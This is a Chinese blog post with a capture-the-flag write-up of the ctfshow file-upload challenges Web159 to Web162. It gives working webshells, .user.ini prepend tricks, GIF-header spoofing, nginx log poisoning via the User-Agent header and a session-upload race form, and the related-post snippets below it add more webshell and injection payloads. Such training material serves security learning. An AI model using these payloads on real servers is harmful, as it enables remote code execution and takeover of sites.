ctfshow(159->162)--文件上传漏洞

最新推荐文章于 2024-11-06 22:48:13 发布
最新推荐文章于 2024-11-06 22:48:13 发布
阅读量850 收藏 8
点赞数 21
CC 4.0 BY-SA版权
分类专栏: 文件上传漏洞 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_56019217/article/details/143373755

Web159

考点:

前端校验+MIME验证+黑名单

思路:

上传.user.ini文件:
文件内容auto_prepend_file=shell.png
由于网页存在前端过滤,只允许上传.png文件,所以我们将文件名修改为.user.ini.png上传,然后抓包删除.png后缀名,就能成功上传了。
在这里插入图片描述然后上传shell.png:
文件内容:<?php @eval($_POST['cmd']);?>
在这里插入图片描述不出所料被过滤了。抓包测试一下过滤了哪些字符。
在这里插入图片描述
由于[]和{}都被过滤了,不能上传一句话木马,直接进行RCE。
又因为括号(也被过滤,所以选择用反引号执行系统命令。

<?=`ls ../`?>
<?=`tac ../fla*`?>

访问/upload目录,得到flag.

Web160

思路:

上传.user.ini文件:
在这里插入图片描述上传shell.png文件:
文件内容<?php @eval($_POST['cmd']);?>
上传失败,抓包测试过滤了什么:
在这里插入图片描述

过滤了{}和[],所以不能使用一句话木马。
过滤了()和反引号,不能直接进行RCE。
考虑使用日志注入,由于过滤了log,所以拼接绕过:

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

在这里插入图片描述

修改UA为:<?php eval($_POST[1]);?>
POST传参:
1=system('ls ../');
1=system('tac ../fla*');

得到flag.

也可以蚁剑连接(要在修改后的UA头写入之后连接,不然日志文件中没有PHP代码)
在这里插入图片描述
在这里插入图片描述
得到flag.

Web161

思路:

上传.user.ini文件,显示文件上传不合规:
在这里插入图片描述其实是添加了文件头校验:

检查上传的文件时,只检查文件的后缀是不够的,还需要检测文件头是否合法。每一种类型的文件都有不同的文件头。文件头的作用其实与后缀很像,都是用于提示文件类型,可以理解为文件的前缀。

所以我们在文件内容前添加 GIF89a ,也就是GIF文件的文件头来绕过检测:

.user.ini文件内容:

GIF89a
auto_prepend_file=shell.png

在这里插入图片描述上传成功!

上传shell.png文件:

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>

上传成功!

修改UA为:<?php eval($_POST[1]);?>
POST传参:
1=system('ls ../');
1=system('tac ../fla*');

得到flag.

Web162

思路:

上传.user.ini文件,上传失败,进行fuzz测试:
在这里插入图片描述
过滤了相当多的字符
[]和{}被过滤,不能直接传一句话木马。
() " ' . 都被过滤,不能进行RCE。
这里看到点.被过滤了,所以我们不能正常上传文件与进行日志包含。
选择session条件竞争的做法。

GIF89a
auto_prepend_file=/tmp/sess_shell  //上传shell.png文件时记得将后缀名去掉

在这里插入图片描述
上传成功!(注:fuzz测试显示下划线_和/也被过滤,但是不知道为什么对上传没有影响)

准备一个上传数据包的网页:

<!DOCTYPE html>
<html>
<body>
<form action="http://67371c84-3fd6-4832-9fa5-fd0dcaedcd64.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('tac ../f*')?>") />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

后续操作暂时没有进行成功,先将思路贴在这里:
在这里插入图片描述

ctfshow文件上传
weixin_53955759的博客
04-15 880
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow 文件上传 web162
Kradress的博客
02-15 2301
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFSHOW 文件上传(学习记录)
ximo的博客
02-16 888
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
ctfshow(151->154)--文件上传漏洞--.user.ini
m0_56019217的博客
10-28 832
可以和上一题一样修改前端代码,也可以将shell.php文件的后缀名修改为.png通过前端验证,然后抓包将文件的后缀名修改回去。由于我们是以.png后缀上传的,所以Content-Type的值是image/png,符合服务端要求,文件成功上传。作用为:在访问主页文件时,会自动包含shell.png文件,将其文件内容当做php代码执行。在前端校验的基础上,增加了对请求头中Content-Type的验证。然后用同样的方式绕过前端验证上传shell.png文件。说明只允许上传.png后缀的文件。
ctfshow(155->158)--文件上传漏洞--绕过黑名单
m0_56019217的博客
10-29 557
将.user.ini.png文件上传,然后抓包去掉.png后缀,就同时绕过了前端校验与MIME验证。这里注意要取消对部分符号的自动URL编码,不然编码后可以上传,但是实际上字符是被过滤了。提示文件类型不合规,但我们确实上传的是.png文件,所以推测是对文件内容的检测。发现与上一题相同,直接使用上一题的payload获取flag即可。上传shell.png,抓包测试过滤了哪些字符。直接连接/upload目录显示返回数据为空。前端校验:限制传入文件的后缀为.png。查看/upload,得到flag.
CTFshow---新春欢乐赛
unexpectedthing的博客
02-11 1394
新春欢乐赛热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
CTFshow-文件上传web161-170
qq_52579508的博客
08-12 368
一开始发现不管输入什么都不行 ,添加了GIF头成功通过上传校验第二步上传 图片,包含了日志的文件 进行解析第三步访问 /upload 目录会解析 日志文件添加user-agent 头里面 添加一句话第四步 连接shell 获取flag。
2024sqlmap语句大全及解析,ctfshow201--213边做题边写笔记
2301_81133475的博客
08-09 2072
ctf.show官方paload给出以上脚本,复制成新的文件就行了,我用的是kali自带sqlmap在目录usr/share/sqlmap目录里的tamper目录下vim个ctf209.py,然后正常用。加入对'select' 的过滤,可以用upppercase这个脚本,但是sqlmap默认就是大写的SELECT 直接按照原来的命令也完全可以,但如果是正常操作的话在207命令后面改为。HTTP/1.1有7种请求方法:1、GET;:这里表名他改了,你可以用我207的方法,那样就不用找表列了,知道数据库就行。
ctfshow(162)--文件上传漏洞--远程文件包含
最新发布
m0_56019217的博客
11-06 337
到这里卡住了,看了一些WP,说是要用flask。但是上述远程文件包含的思路是对的,使用flask的内容之后再补上。上传远程调用文件,后缀设置为.png,抓包修改文件名为shell,成功上传。接下来就是上传包含一句话木马或恶意命令的shell文件。因为过滤了点,所以我们之前的那些上传方法都不能使用。这里学习一个新的上传方法:远程文件包含。告警,大意是不允许包含外部网站的内容。过滤了特别多符号,注意过滤了。上传.user.ini文件。
CTFSHOW文件上传
羽的博客
11-19 9559
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀 152
CTFshow 文件上传 web159
Kradress的博客
02-15 536
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 相比之前题目的过滤发现()也不能用了,不过可以用取反和异或来绕过 不需要括号的函数 echo require include Y1ng师傅的取反脚本,用data协议来执行代码 <?php $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~
ctfshow-web入门-文件上传web161、web162web163)远程包含
Welcome To Myon'Blog !
07-09 2601
后面又去 b 站看了下视频,发现它远程包含的就是一个 php 文件,而我这里包含的 shell 是一个纯文本的东西,我最开始以为是将这段内容包含进了 index.php 的代码里,所以就没有考虑它不是 php 后缀是否可以正常解析的问题。后面问了群里的师傅,说用 flask,我原本用的是 Apache 搭的服务,重置了服务器,Apache 和 php 其实都是刚下的,可能还需要配置点什么吧,不清楚,因此我们将木马放到 flask 服务上去。那么我们上传的文件名就不使用后缀即可:这里以 test 为例。
ctfshow web162-170
m0_74057302的博客
03-13 2328
往事暗沉不可追,来日之路光明灿烂
ctfshow [堆利用-前置基础] 135-159--更新完毕
saulgoodman的博客
07-08 791
先把这篇博客放在这里有时间就更。主要是太懒了,又是颓废的一天。
WebCTFSHOW 文件上传刷题记录()
uuzeray的博客
01-16 1953
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
ctfshow -web文件上传
m0_72898152的博客
02-02 1438
ctf
ctfshow web入门 文件上传前篇(web151-web160)
ccfly1012的博客
09-17 1238
目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈: <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值